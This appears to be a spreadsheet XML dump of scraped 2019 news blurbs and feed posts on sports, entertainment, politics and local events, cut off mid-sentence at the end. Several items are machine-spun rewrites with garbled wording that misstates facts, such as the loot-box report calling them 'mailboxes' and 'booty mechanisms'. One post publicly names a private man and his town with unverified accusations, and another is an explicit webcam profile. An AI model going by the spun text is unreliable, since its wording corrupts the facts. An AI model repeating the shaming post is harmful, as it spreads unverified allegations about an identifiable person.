    <t>Former Texas Tech Star and NBA Veteran Andre Emmett Killed in Front of His Dallas Home Original Source Andre Emmett, a former basketball player for Texas Tech, the NBA and the BIG3 league, was shot and killed in his hometown of Dallas, Texas, on Monday at 2:30 a.m. According to KCBD 11, Emmett was sitting in his vehicle in front of his home when he was approached by two men who pulled out a gun. An “altercation” began, and Emmett was shot as he tried to run away. Andre Emmett, who played for the NBA and Big3 league, was shot and killed in his hometown of Dallas. (Photo: Jamie Squire / Getty Images Sport via Getty Images) He was later found “several hundred feet” from his home by someone who called 911 and later died at the hospital at the age of 37. Police are now looking for two black males, one of them described as being tall and slender. It’s also said the men fled in a white Chrysler 300 after the shooting. A 6-foot-5 guard, Emmett was considered a star at Texas Tech when he played for the Red Raiders from 2001 to 2004, and he’s the school’s all-time leading scorer with 2,256 points. He was inducted into the Texas Tech Hall of Fame in 2018, and his name is currently engraved in United Supermarkets Arena. He was selected by the Seattle Supersonics in the 2004 NBA draft as the 35th pick and also played for the Memphis Grizzlies, as well as the New Jersey Nets. Emmett played overseas as well and played two seasons for the BIG3 on 3’s Company, where he was the second-leading scorer in the league. “The BIG3 is in a state of shock over the sudden and tragic death of Andre Emmett,” said the league in a statement. “Andre was a member of the BIG3 family for two seasons and never without a smile on his face … His kindness towards others and easy-going demeanor made him a joy to be around.” Texas Tech also put out a statement. “Thank you for the competitor you were on the court and the incredible person you were off of it,” a tweet sent Monday read. “Thank you for the many amazing memories you helped create. “Thank you for inspiring the entire Texas Tech family. Rest In Peace, Dre.” !function(f,b,e,v,n,t,s)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‘1595920664044276’); fbq(‘init’, ‘526423591160886’); fbq(‘init’, ‘268741230617931’); fbq(‘trackSingle’, ‘1595920664044276’, ‘Lead’); window.fbAsyncInit = function() FB.init( appId : ‘423701050974928’, xfbml : true, version : ‘v2.10’ ); FB.AppEvents.logPageView(); ; (function(d, s, id) var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = “http://connect.facebook.net/en_US/sdk.js”; fjs.parentNode.insertBefore(js, fjs); (document, ‘script’, ‘facebook-jssdk’));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Former Texas Tech Star and NBA Veteran Andre Emmett Killed in Front of His Dallas Home appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>dealbot</t>
  </si>
  <si>
    <t>Grand final special. I believe this price applies to - pie pasties sausage rolls burritos</t>
  </si>
  <si>
    <t>THE ROYAL FAMILY are no strangers to flying, with the royal estimated to have touched down in over 100 different countries in its lifetime. Used to luxury, their air travel is no different, and now the public have been given exclusive an exclusive peak inside the secret, royal terminal. Daily Express :: Travel Feed</t>
  </si>
  <si>
    <t>Arabic Swahili Dictionary – travel dictionary to translate Arabic to Swahili. Click on the list to show Arabic or Swahili synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Arabic Swahili Dictionary →</t>
  </si>
  <si>
    <t>Today, the UK Parliament's Committee on Digital, Culture, Media and Sports has published a lengthy report on the problems of the technology industry. The committee makes the most appropriate recommendation that mailboxes be regulated by the Gambling Act and that these objects not be sold to children. DCMS also states that some representatives of the gaming industry have "displayed a lack of honesty and transparency" in related hearings – and that they are not fans of the one in which EA coined the term "Mechanics of surprise". Previously, the United Kingdom's Gaming Commission had decided that object boxes could not be regulated as games of chance because there was no mechanism to turn the items received into the game into real money. According to the DCMS report, this is "arguably a shift from the digital economies of the gaming industry" because the locker objects have a different value – and many players have expressed the wish to buy them directly. Similarly, the DCMS argues that while the terms and conditions of most games expressly prohibit the sale or exchange of gaming objects in real money, game publishers fail to prevent this type of sale. So there is a devious way to exchange game objects for real value. According to the DCMS, "academics globally recognize that there is not yet enough evidence to conclusively conclude that chests pose the problem of gambling." However, even though there is no significant evidence that chests are addictive to gambling, other studies suggest that problem gamblers behave similarly to booty mechanisms – and that bond is stronger. in adolescents than in adults. The report states that "some representatives showed a lack of honesty and transparency" and were "deliberately obtuse" in answering questions about the data collected on how players participate in games. The DCMS also challenged statements by EA's Kerry Hopkins, who called the FIFA Ultimate Team packs "very ethical and fun" at a hearing earlier this year. "This is clearly out of sync with the attitude of the players who contacted us after our evidence session," says the report, "including those who categorically rejected his description of the packs, not as surprise boxes. but as "mechanisms of surprise". The report concludes that "chests that can be purchased with real money and do not reveal their contents in advance are games of chance played to their fair value". This places the loot chests under the umbrella of the act of play, and would require these mechanisms to be regulated as a game. In its conclusions, the DCMS states that the government should adopt, in the next parliamentary session, a regulation on loot boxes under section 6 of the Gambling Act to confirm that loot is a game of chance. The DCMS says that it should produce a document "stating clearly why", it does not consider loot chests as gambling. Beyond this, the DCMS states that chests should not be sold to children and that PEGI classifications of games with chests should label the content as "play". INFO</t>
  </si>
  <si>
    <t>Nil Va Biz F ** ck * d It !!! | AFTV Uotford va Arsenal VLOG Hozir ro'yxatdan o'ting: https://goo.gl/Zq9NcA […] The post Nil va Biz F * ck * d It !!! | AFTV Uotford va Arsenal VLOG appeared first on Shop Reviews.</t>
  </si>
  <si>
    <t>Olly Hawkins</t>
  </si>
  <si>
    <t>Sean Longstaff will miss tomorrow’s game at Liverpool after suffering a ‘freak’ ankle injury in training yesterday – Full story here. Steve Bruce has shared a positive update on the injury front, but tomorrow’s game will come too soon for Saint-Maximin, Carroll, Ritchie, Gayle, Lejeune, Longstaff and Yedlin – Full story here. Jurgen Klopp believes NUFC will pose a &amp;# Source</t>
  </si>
  <si>
    <t>A TEENAGE girl has been viciously attacked twice at Helensvale and police are hunting the school-aged perpetrators.</t>
  </si>
  <si>
    <t>Dana McCauley</t>
  </si>
  <si>
    <t>The national redress scheme for survivors of institutional child sexual abuse, offering compensation and counselling, will be broadened after more organisations signed on.</t>
  </si>
  <si>
    <t>Storm Imelda caused power outages in Houston, Texas, on Wednesday, September 18, after it made landfall and thunderstorms battered the area. The tropical depression, which formed over the Gulf of Mexico, moved slowly across the Lone Star State on Wednesday, local media reported. In a video uploaded to Twitter, user @xSTRICKLYDUBx said the Houston skyline was blanketed in darkness, as lightning flashed in the distance. “Wow, the power is out everywhere,” the user says in the video. Storm Imelda was expected to bring heavy rain to the Houston area for the duration of Wednesday, September 18. Jeff Lindner, a meteorologist with the Harris County Flood Control District (HCFCD), a government agency, said that up to 20 inches of rainfall were recorded in the storm’s first 24 hours. As of 10:30 am local time, September 18, Houston power company Center Point Energy said that, despite the storm, 99.89 percent of its customers had electricity. Credit: @xSTRICKLYDUBx via Storyful</t>
  </si>
  <si>
    <t>Shane does not help with his 3 year old daughter with autism. He doesn’t see her, check on her, she busted her head open and he said he was with his girlfriend and refused to be there for his daughter, he owes thousands in child support. Has NOTHING to do with his daughter at all. The post Shane Phillip VanCleave — Newport News, Virginia appeared first on Cheater Xposed - Cheater Exposed USA.</t>
  </si>
  <si>
    <t>HA GIANG EASY RIDER TOUR PART 2 – YESD RESPONSIBLE TRAVEL The post HA GIANG EASY RIDER TOUR PART 2 – YESD RESPONSIBLE TRAVEL appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>Annie Silverstein’s feature debut “Bull” swept three awards at the 45th Deauville American Film Festival, including the Grand Prize, the Revelation Prize for best first film and the Critics’ Prize. “Bull,” a portrait of a rebellious teenage girl from South Texas, world premiered at Cannes’s Un Certain Regard and marks Silverstein’s follow up to her […] Variety The post Annie Silverstein’s ‘Bull’ Takes Top Awards, Robert Pattinson Starrer ‘The Lighthouse’ Wins Jury Prize at Deauville appeared first on Crosat - News from the entertainment and multimedia.</t>
  </si>
  <si>
    <t>World News &amp;amp; Analysis</t>
  </si>
  <si>
    <t>China plans to exclude American farm goods including soybeans from tariffs, the latest move to ease trade tensions before the two countries restart trade talks next month.</t>
  </si>
  <si>
    <t>In ABC ME’s new local drama twin brothers learn that children are being mysteriously controlled. 5:30pm Sunday. Australia’s Got Talent Backtrack Boys Les Norton 60 Minutes The Affair</t>
  </si>
  <si>
    <t>COUNTRY Liberal Party heavyweights Jason Riley and party president Ron Kelly have both refused to comment on an alleged verbal altercation this week which is alleged to have culminated in Mr Riley calling Mr Kelly a “c**t”.</t>
  </si>
  <si>
    <t>Cameron Myles</t>
  </si>
  <si>
    <t>Opposition to plans for a container port in Kwinana has intensified since the Westport Taskforce released its shortlist last month.</t>
  </si>
  <si>
    <t>Matt Carty</t>
  </si>
  <si>
    <t>Upper Grand showed improvement in academic math scores, while Grade 6 math scores were low in both public and Catholic school boards.</t>
  </si>
  <si>
    <t>FRIENDS has been on our screens for over 25 years but how many times did Ross Geller get married? Here’s everything you need to know. Daily Express :: TV and Radio Feed</t>
  </si>
  <si>
    <t>Mitchell Moses ought to be wary after Cameron Smith identified him as the key man for Parramatta in Saturday night's sudden-death semi-final.</t>
  </si>
  <si>
    <t>CGI UK Trip The post CGI UK Trip appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>Roy Ward</t>
  </si>
  <si>
    <t>Canberra punished a poor Melbourne performance with a try with three minutes left to play at AAMI Park on Saturday night.</t>
  </si>
  <si>
    <t>Justice McGrath noted Dodd had long abused his partner of 18 years, had a significant criminal record and had spent 12 years of his adult life in prison.</t>
  </si>
  <si>
    <t>Chris Waugh claims that Newcastle’s first choice targets following Rafa Benitez’s exit were Nice boss Patrick Vieira and Man City coach Mikel Arteta. The north-east writer for The Athletic also believes that Bruce was a ‘third of fourth choice’ option for the club, claiming Ashley saw him as a ‘safe pair of hands’ when their pursuit of a ‘young, European, forward-thinking’ failed. Here’s what Waugh has had to say during an appearance on Newcastle Fans TV’s latest podcast: “Bruce certainly wasn’t that far down the list. “Who Newcastle’s first choice was? Now I know they looked at Patrick Vieira. They were very keen on Patrick Vieira. “The same with Mikel Arteta, the assistant manager at Man City. I think talks got reasonably advanced with Arteta’s people and I think there was a stage where he was considering it, but it never got to the stage where it was imminent and he was going to be appointed. “That’s what I don’t understand about what Newcastle did over the summer. They initially went for a young, European, forward-thinking manager, then they reverted to Steve Bruce.” “I think Bruce was third or fourth choice on the list and the back up to the first couple of choices that they couldn’t get.” While this does suggest that Bruce was not way down our shortlist as Sky Sports once claimed soon after his appointment, it does indicate that our interest in Vieira and Arteta was serious. With this in mind, it’s worth going back to that article from the Sun’s David Coverdale back in July, which claimed that Rafa Benitez had told both Vieira and Arteta NOT to take the job. It’s probably time we moved on now Bruce has got the job, but this sheds some light on our scatter-gun approach over the summer – which saw Ashley settle for Bruce once our brief pursuit of an exciting young coach proved to be fruitless. (Fancy writing for us? Send any articles/ideas over to us at NUFCblogsubmissions@gmail.com &amp; we’ll get back to you!)</t>
  </si>
  <si>
    <t>They don't have much but the kids are alright.</t>
  </si>
  <si>
    <t>Kalina Laframboise</t>
  </si>
  <si>
    <t>Police say they arrested a man in his 70s not far from the scene.</t>
  </si>
  <si>
    <t>Demi Knight</t>
  </si>
  <si>
    <t>Thanks to joint funding from the provincial and federal governments, a new seniors living facility opened Thursday in Raymond, Alta.</t>
  </si>
  <si>
    <t>Iran’s president says indirect discussions with Washington can only happen if sanctions are lifted. The post Iran nuclear deal: Rouhani rules out bilateral talks with US appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>A REMARKABLE device designed to generate electricity in the dead of night has powered an LED light, promising a revolutionary new source of renewable energy. The post Renewable energy breakthrough: ‘Remarkable’ device generates electricity under night skies appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>THE CHASE was back with a celebrity special tonight as four famous faces went head to head with Mark Labbett. But for one of them, their joke went a little too far and Bradley Walsh stepped in. Daily Express :: TV and Radio Feed</t>
  </si>
  <si>
    <t>My Kinks: feet Webcam profile: I consider myself a sweet and kind woman, I like to have friends that endure, and I love to take the time to look more deeply into each one, to know what he likes and not to each person and what makes it different. Favourite sex position: all What I do in my amateur show: I am open to requests to make your private unforgettable, just do not be shy and tell me your fantasies What I don’t like: rude people Gallery</t>
  </si>
  <si>
    <t>Peter Ryan</t>
  </si>
  <si>
    <t>Essendon premiership forward Matthew Lloyd has backed the Bombers' flotilla of speedy forwards to test the West Coast defence.</t>
  </si>
  <si>
    <t>By James O 'Connor, Monday 9th September 2019 04h23 GMT The Remastered edition of Final Fantasy Crystal Chronicles will not make 2019 after all – but it will arrive in early 2020, at least. The remake of the GameCube four-player cooperative adventure RPG will arrive on January 23, 2020. It comes on Switch and PS4, but also on mobile devices. The news is broadcast via the official Twitter account of Final Fantasy, confirming that fans of the game will want to organize their cooperation sessions for the month of January. The beloved classic #Final Fantasy CRYSTAL CHRONICLES returns in a beautiful HD for # PS4, #NintendoSwitch, iOS and Android on January 23, 2020. pic.twitter.com/F6r1R6CX2n – FINAL FANTASY (@FinalFantasy) September 9, 2019 Final Fantasy Crystal Chronicles is something a little different in the canon of Final Fantasy, replacing turn-based battles with an action-game style. The original version of GameCube also encouraged players to connect a Game Boy Advance to the GameCube and play it as it was intended for it – a cooperative on the four-player couch where each player had a bonding cable attached to a Game Boy – was very difficult to organize for most people. Critics at the time were largely positive. This version will use the online multiplayer mode and, we imagine, probably will not support the Game Boy Advance. There will also be a cross game, so you can compete against your friends on other systems, including mobile. Sometimes we include links to online stores. If you click on one and make a purchase, we could receive a small commission. For more information, go here.</t>
  </si>
  <si>
    <t>FOX Showcase has confirmed sprawling UK fantasy His Dark Materials will be fast-tracked to screens in early November. Based on Philip Pullman’s novel the cast now includes Dafne Keen, Ruth Wilson, James McAvoy, Lin-Manuel Miranda, Helen McCrory and David Suchet amongst others. This will screen 1 day after the UK premiere. Based on author Philip Pullman’s award-winning trilogy of the same name, considered a modern masterpiece of imaginative fiction, the series has been picked up for two seasons and features a stunning ensemble cast lead by Ruth Wilson (Golden Globe winner for The Affair), Lin-Manuel Miranda (Tony winner for the musical Hamilton) and James McAvoy (Golden Globe nominee for Atonement). The first 8-episode season follows Lyra (Dafne Keen), a seemingly ordinary but brave young woman from another world. Lyra’s search for a kidnapped friend uncovers a sinister plot involving stolen children, which leads to a quest in understanding a mysterious phenomenon called Dust. Keen is joined by McAvoy as Lyra’s Uncle Asriel; Wilson as socialite Mrs Coulter; and Miranda as the adventurer Lee Scoresby. The series also boasts a stellar supporting cast including Anne-Marie Duff, Clarke Peters, Will Keen, Ian Gelder, Georgina Campbell and James Cosmo. Jack Thorne (Harry Potter and the Cursed Child) has adapted the novels for television, with the first two episodes directed by Oscar-winner Tom Hooper (The King’s Speech). His Dark Materials is produced by Bad Wolf and New Line Cinema for BBC One and HBO. Executive producing the series are: Dan McCulloch, Jane Tranter, Joel Collins and Julie Gardner for Bad Wolf; Philip Pullman, Jack Thorne, Tom Hooper, Otto Bathurst; Deborah Forte, Toby Emmerich and Carolyn Blackwood for New Line Cinema; and Ben Irving and Piers Wenger for BBC One. His Dark Materials is exclusive in Australia to Foxtel. Tuesday, November 5 at 8.30pm on FOX Showcase.</t>
  </si>
  <si>
    <t>Chaos or control? Lynch or Cameron? Grimes or Haynes? Two very different teams are about to face off in the AFL grand final, and a closer look at what makes them tick promises a classic premiership decider.</t>
  </si>
  <si>
    <t>John Starks Almost Repeated His Iconic Dunk On Michael Jordan Against Pacers Original Source New York Knicks legend John Starks almost repeated the same dunk he did on Michael Jordan and the Bulls against the Pacers. During the 1993 Eastern Conference Finals, Starks threw a lefthanded slam against the Chicago Bulls. With just over 50 seconds remaining in a three-point game, Starks took the ball up dunked on Jordan and a number of Bulls players. The iconic dunk went on to become known in the NBA as “The Dunk.” And Starks revealed that 25 years ago, there was a game when he almost did the same dunk. In a recent interview during the promotion of Madison Square Garden All Access Tours, Starks uncovered how “The Dunk” almost happened against their Eastern Conference rivals Indiana Pacers. According to Starks, he was already thinking about it before even driving to basket but as soon as he jumped, he realized he didn’t have enough “hops” to dunk the ball in, Metro reported. “Game 7 against the Indiana Pacers. The game was on the line and I was just coming off a knee surgery and I remember I had a pick and roll with me and Patrick [Ewing]. In my mind I’m trying to recreate ‘the dunk’ again, I was seeing the same thing happening,” Starks recalled. “I went up and the hops weren’t there! I went up against Dale Davis. I was going to go up left and I had to change it and all I could do was get it up off the board and I missed the shot,” Starks revealed. The Knicks legend also noted that they were very lucky that Patrick Ewing was there to clean up his mess. “Here comes Patrick, out of nowhere, to save me and dunk it back in,” Starks said. Indiana Pacers and New York Knicks have had historic playoff rivalries during the 90’s. As shooting guards, Starks and Pacers legend Reggie Miller shared a lot of memories battling each other inside the court. Miller and Starks matched up 56 times in their careers, 33 times in the regular season and 23 times in the playoffs. Looking back at his rivalry with Miller, Starks revealed that guarding the former Pacers star was his toughest assignment back then. Starks also emphasized that Miller loved being a villain especially against the Knicks, Indy Star reported. He was special in that way. He liked being the villain. Most guys don’t like that role, especially in the modern NBA. But Reggie embraced it . I think that’s what made him special when he came to the Garden,” Starks said. Before Jeremy Lin, there was John Starks. The guard went on to be one of the key players on the Knicks in the 1990’s. Starks won the Sixth Man Award in 1997. Photo: Reuters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John Starks Almost Repeated His Iconic Dunk On Michael Jordan Against Pacers appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Dubster's Place</t>
  </si>
  <si>
    <t>Sunstars - Dance All Night is OUT NOW on Spinnin' Next! Like this track? Download on Beatport or add it to your favourite Spotify/Apple Music playlist by clicking HERE: https://spinninnext.release.link/dance-all-night-1!YT Make sure to subscribe to Spinnin' Records: http://bit.do/spinnintv ..and turn on notifications to stay updated with all new uploads!🔔 Join our Spinnin' Records Top 100 […] The post Sunstars – Dance All Night (Official Music Video) appeared first on Dubster.</t>
  </si>
  <si>
    <t>GNN</t>
  </si>
  <si>
    <t>Nominations are open for several Canadian Golf Superintendents Association awards with a deadline of Nov. 30. Click the links below for information on each award and a nomination form. John B Steel Award CGSA/Rain Bird Environmental Award CGSA/Toro Assistant Superintendent of the Year Award CGSA/Foley Company Equipment Technician of the Year Award CGSA Student Scholarship […]</t>
  </si>
  <si>
    <t>The Environmental Science business of Bayer, within the company’s Crop Science division, has announced appointments for several leadership positions. These changes will enhance focus on finding innovative solutions for the evolving needs of customers. Axel Elling Ph.D., will lead the turf and ornamental product development team responsible for disease, nematode, insect, weed and turf stress management. Axel will remain responsible for disease and nematode management solutions, and will lead a team including Bruce Spesard, focused on weed management; Xulin Chen, focused on insect management; and Chenxi Zhang, focused on stress management. Jake Doskocil, Ph.D., has been named global project leader of pest management and rodent control for environmental science. He most recently served as product development manager for insecticides and led the Clayton Development and Education Center for Environmental Science. Nonggang Bao, Ph.D., has been named as head of the environmental science field solutions development and experience center in Clayton, N.C., biology team manager and will also be responsible for leading projects within the ES global specialty actives team. Xulin Chen, Ph.D., joins the T&amp;O Field Solutions team as product development manager for environmental science. She brings more than eight years of broad entomology expertise to the team. “We are thrilled to welcome this change among top innovators within our organization,” said Richard Rees, Ph.D., head of ES field solutions in North America. “At Bayer, we’re dedicated to keeping strong leadership in customer-facing roles to provide the innovation and support our professional customers need.” Source link</t>
  </si>
  <si>
    <t>Dawn Huddlestone</t>
  </si>
  <si>
    <t>Photos courtesy of Algonquin Outfitters With five days left to bid online in the second Algonquin Outfitters Paddle Art Auction, the fundraiser has already exceeded expectations. Bidding on the 182 paddles submitted to the contest has surpassed AO’s $10,000 goal, with total bidding already in excess of $11,000. All of the funds raised will be divided among five arts-related charities: the Algonquin Art Centre, Artists in Schools – Haliburton, Oxtongue Lake for Arts and Culture, Tom Thomson Gallery in Owen Sound, and the Town of Huntsville’s reserve fund for future acquisition of public art The company will be hosting a live event this weekend, with live music, a screening of the film Wild Temagami, craft beer samples from Lake of Bays Brewery, and a paddle viewing. The main event will be held on Saturday, September 28 from 10 a.m. to 4 p.m. (note the new date) with a sneak peek on Friday between 3-6 p.m. At the Friday sneak peek, enjoy the music of Sean Cotton and craft beer samples. On Saturday, Christine Heron and Jason Hack will play from 11 a.m. until 1 p.m., followed by the movie at 1:00 p.m. Paddle viewing will remain open until 4 p.m. The auction site is mobile-friendly, so bids can be placed on the spot—if you see it and you like it, make a bid! AO staff will be there to help if needed. Bidding will continue online into Sunday, September 29, with the auction closing one paddle at a time in 60-second increments beginning at 6:00 p.m. There is a minimum bid of $25 per paddle. During regular bidding you can raise the bid by as much as you want, from $1 up. If a bid is placed within the final minute for that paddle, a soft close will kick in: an additional 60 seconds will be added to the bidding time and will continue to be added each time a bid is placed. The soft close will continue until no further bids are received within the 60 seconds remaining for that paddle. (Closing of the other paddles will continue on schedule.) To prevent a drawn-out bidding war during a soft-close, a minimum bid will be imposed as the price of the paddle rises. Below $50, it’s $1, from $50-99 it’s $2.50, from $100-199 the minimum rises to $5, from $200-499 it’s $10 and above $500 the minimum bid increase will be $25. You must register to bid—be sure you don’t leave it until the last minute. Although more than 40 paddles already have bids higher than $100 (seven of them exceeding $400), there are still many paddles with lower or no bids registered yet—something for every budget. Once the auction closes all bids are final. Paddles can be picked up at AO in Huntsville, or shipped anywhere in the world (shipping charges apply: $25 within Canada, $50 within the rest of North America, and $100-$150 for anywhere else in the world). Many of the artists proudly posed with their paddles before submitting them. You can see a few of them below. All of the paddles are available for viewing on the auction page here. Don’t miss out on Doppler! Sign up here to receive our email digest with links to our most recent stories. Local news in your inbox three times per week! Like The post Excitement (and bids) are building in the second Algonquin Outfitters Paddle Art Auction appeared first on Huntsville Doppler.</t>
  </si>
  <si>
    <t>My Take On The Fitness 'Bandwagon' And The Multi-Billion Dollar Wellness Industry Original Source A new technique, 'intermittent fasting', has caught on. Under this fasting routine, one can go on a 12-hour, 16-hour, or an 18 hour-long fasting window,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My Take On The Fitness 'Bandwagon' And The Multi-Billion Dollar Wellness Industry appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Millions of people around the world are expected to take to the streets to call for urgent measures to tackle climate change. Read more? Click here</t>
  </si>
  <si>
    <t>Broncos coach Anthony Seibold faces some critical decisions over summer that could make or break his tenure at Red Hill. Here are the five decisive moves Seibold must make to put the Broncos back on the path to premiership success.</t>
  </si>
  <si>
    <t>Child killer Michael Guider has walked free from Long Bay jail in Sydney after serving a 17-year sentence for the manslaughter of schoolgirl Samantha Knight, Prime Minister Scott Morrison has declined to give further details about a Federal Police raid on a current Commonwealth official and an 18-year-old man has been charged over the alleged murder of another teenager after he was stabbed to death in a Gold Coast park. Image: News Corp Australia</t>
  </si>
  <si>
    <t>Facebook's attempt to drag cryptocurrencies into the mainstream with its Libra digital coin met with further scepticism on Monday when an ECB board member said such "stablecoins" posed serious risks.</t>
  </si>
  <si>
    <t>ALONGSIDE the hotly-anticipated Mate 30, Mate 30 Pro, and new Watch GT, Huawei unveiled a stunning new 4K television set during its bumper launch event in Munich yesterday. Daily Express :: Tech Feed</t>
  </si>
  <si>
    <t>10 has announced further names for its coverage of the Melbourne Cup Carnival including hosts Matt White and Roz Kelly plus reportage from Anna Heinrich, Kate Peck, Beau Ryan, and Scott Tweedie. They join the previously announced Francesca Cumani (Racing Host), Peter Moody (Expert Commentator), David Gately (Form Expert), Michael Felgate (Racing Reporter), Caty Price (Racing Reporter) and Brittany Taylor (Horseback Interviewer). Network 10’s head of sport, Matt White said: “A huge part of the Melbourne Cup Carnival is the fashion, the celebrity spotting and all the glitz and glamour that truly makes it one of the best events on the Australian sporting calendar. “You’ve already heard about our incredible team of racing experts, and now I’m thrilled that we have assembled such a talented bunch of reporters to bring viewers all the colourful action from around the track.” Coverage begins with Victoria Derby Day on Saturday, 2 November, followed by Melbourne Cup Day on Tuesday, 5 November, Oaks Day on Thursday, 7 November and Stakes Day on Saturday, 9 November. Making her mark as Fashion Reporter is Anna Heinrich who along with Roving Reporters Kate Peck and Beau Ryan, will be covering all things celebrity and fashion in the world-famous Birdcage. Flemington’s premium marquee enclosure, The Birdcage is the playground of the rich and famous and is the place to be seen. They’ll also be dropping by The Park, home of Australia’s largest and most prestigious fashion event, Myer Fashions on the Field. With The Park set for a stellar line up of entertainment, music fans and racegoers alike are in for a treat. Scott Tweedie will be on hand as Roving Reporter so viewers at home don’t miss a thing.</t>
  </si>
  <si>
    <t>The explosion set off a huge fire at one of the two Saudi Aramco sites, the Saudi Interior Ministry said.</t>
  </si>
  <si>
    <t>lysanne.larose@mcgill.ca</t>
  </si>
  <si>
    <t>BLURB</t>
  </si>
  <si>
    <t>BBC News - UK</t>
  </si>
  <si>
    <t>Tottenham throw away a two-goal lead as last season's Champions League finalists are forced to settle for a point against Olympiakos in Greece. The post Champions League: Olympiakos 2-2 Tottenham Hotspur appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>We are not sure anyone will have noticed, but there is currently a small independent title called Untitled Goose Game. If you're really unfamiliar with House House's cheery and mischievous adventure, you play as an incumbent plumage foe that wreaks havoc on a peaceful English village. It's wonderful and, currently, not on PlayStation 4. However, we can at least enjoy this rather brilliant work of art representing the pilgrim passages with one of the greatest games on the horizon: The Last of Us: Part II. Unsolicited Mashup @The naughty dog X @ House House_ pic.twitter.com/wVZTdtuDQ0– pandamusque (@pandamusque) September 30, 2019 It's even had Neil Druckmann's blessing, who described it as "the team we deserve". After playing the hilarious hello simulator, we can confirm that this bird can defend itself. Joel and Ellie will certainly want them on their side when things get complicated, and if things went wrong, they could, you know, eat them. Unless he's infected, of course. Whatever it is, what do you think of this silly crossover? Should the hen go with Ellie and Joel in their last adventure? Have a look in the comments below. .</t>
  </si>
  <si>
    <t>Top Dentist Near Airdrie Alberta Kid Friendly Dental Clinic Near Airdrie Alberta Friendliest Dental Clinic Near Airdrie Alberta Kid Friendly Dentist Near Airdrie Alberta Recent Comments Archives August 2019 July 2019 June 2019 May 2019 April. See here the whole list of our best Dentists from Airdrie and their surroundings reviewed by StarOfService community from North Lanarkshire – Scotland. Do you want to know who. Do you want to know who is in the top 100 ? Explore Join as a Professional Sign up Log In Log In. Airdrie, Alberta 141 Dentists near you Go StarOfService Alberta Airdrie Dentists Hire the best Dentists 1. Railway Avenue Dental Dentist. . Preferred Dental Clinic In Airdrie Sierra Dental Airdrie is a full-service clinic, providing your family with complete dental care. Visit our Airdrie Dentist today or call (403) 768-1000. Location: Airdrie Switch Location Calgary Airdrie Home About Blog FAQ Contact CAREER. Substantial surgical procedures are also Number 1 Dental Clinic In Airdrie Alberta Best Dentist Near Airdrie Best Dentists in Airdrie, AB – Airdrie Choice Dental, Bayside Dental &amp; Orthodontics, Blunston Dental Group, North Main Family Dental, Sierra Springs Dental, Kingsview Dental, Nose Creek Dental Centre, Grace Family Dental, Sonata Dental, Bayside Dental Bayside Dental &amp; Orthodontics Offers Orthodontics Solutions in Airdrie – Bayside Dental &amp; Orthodontics has over the years been known to feature some of the top Airdrie dentists. Bringing years of. RCMP asking for video of mall shooting near Calgary as investigation continues – Airdrie RCMP continue to investigate a shooting at CrossIron Mills mall near Calgary. gn-embed-wrapper. RCMP update investigation into mall shooting near Calgary – Airdrie RCMP Insp. Kimberly Pasloske provided. gn-embed-wrapper. The Best Children Dentists in Airdrie Handpicked Top 3 Children Dentists in Airdrie, AB. They face a rigorous 50-Point Inspection, which includes everything from checking reviews, ratings, reputation, history, complaints, satisfaction, trust and. Friendliest Dentist In Airdrie Alberta “I was in Grade 1. At the time, Airdrie’s population was around 10,000 and it was really big news. We were called Alberta’s friendliest city,” says Trevor, who is now in his 30s. He says. Here is a list of Reviews on Dentist Reviews in Airdrie, AB – Airdrie Choice Dental, Blunston Dental Group, Bayside Dental &amp; Orthodontics, Sonata Dental, West Airdrie Dental, Rahul Mathur, DDS – Airdrie 8th Street Dental, Sierra Springs Dental, Thayne.</t>
  </si>
  <si>
    <t>Shane Mumford was crook the last time Greater Western Sydney took on the Western Bulldogs, and his knee feels all the better for it.</t>
  </si>
  <si>
    <t>VOS CONSTRUCTION has won the almost $17 million contract to build Devonport’s waterfront park precinct — the centrepiece of the northwest city’s bold $250 million Living City Project.</t>
  </si>
  <si>
    <t>lowkell</t>
  </si>
  <si>
    <t>“Hat tip” to Don Rippert, over at Bacon’s Rebellion, for bringing this story to my attention: The Coalition for Integrity (C4I) has rated the political ethics enforcement approaches of the 50 states. Virginia’s ethics enforcement is so weak that it is one of seven states that cannot be rated. That’s right; as you can see from the following table, overwhelmingly Virginia “ethics enforcement” is a complete joke, with “None or Limited Power” the key phrase. Meanwhile, of course, powerful corporate interests have enormous power, including the ability to give unlimited amounts of money to politicians – even in the case of a supposedly “state-regulated” utility like Dominion Energy. Not that this situation is anything new, of course; see this Blue Virginia article from 2014, for instance, which highlighted a report that ranked Virginia 47th out of 50 states – an “F” grade – in the area of ethics. Or check out Jeff Thomas’ writings on the “Virginia Way” as a cesspool of corruption. The result of Virginia’s disgracefully lax ethics enforcement is clear: a system heavily tilted towards those with the resources and power to “capture” the regulators and corrupt the legislators. Of course, that’s not going to be regular people like us. Thus, according to VPAP (which is also heavily “captured” by powerful corporate interests, but that’s another story), some of the top Virginia political donors over the years – aside from the political parties themselves – include…yep, Dominion Energy ($11.8 million), Altria ($6.8 million), Virginia Realtors ($5.8 million), Virginia Auto Dealers ($5.8 million), Verizon ($5.1 million), VA Bankers Assn. ($5.0 million), etc. And no, these folks are not donating millions of dollars out of the goodness of their corporate “hearts,” but because *they want stuff* and are hell-bent on getting it. By the way, making the “Coalition for Integrity” ratings even more damning – and somewhat ironic – is the fact that this group is actually…well, check it out. Transparency International USA had increasingly been seen in the United States as a corporate front group, funded by multinational corporations — the same multinationals that corrupt the U.S. political system. Its million dollar a year budget was sustained by contributions from Bechtel Corporation, Deloitte, Google, Pfizer ($50,000 or more), Citigroup, ExxonMobil, Fluor, General Electric, Lockheed Martin, Marsh &amp; McLennan, PepsiCo, PricewaterhouseCoopers, Raytheon, Realogy, Tyco ($25,000–$49,999), and Freeport-McMoRan and Johnson &amp; Johnson (up to $24,999). It yearly gave its annual corporate leadership award to one of its big corporate funders. In 2016, the award went to Bechtel. Its board of directors was dominated by corporate lawyers, many of whom defend companies from charges of foreign bribery. Other than the name change from Transparency International USA to the Coalition for Integrity, it’s unclear whether or not 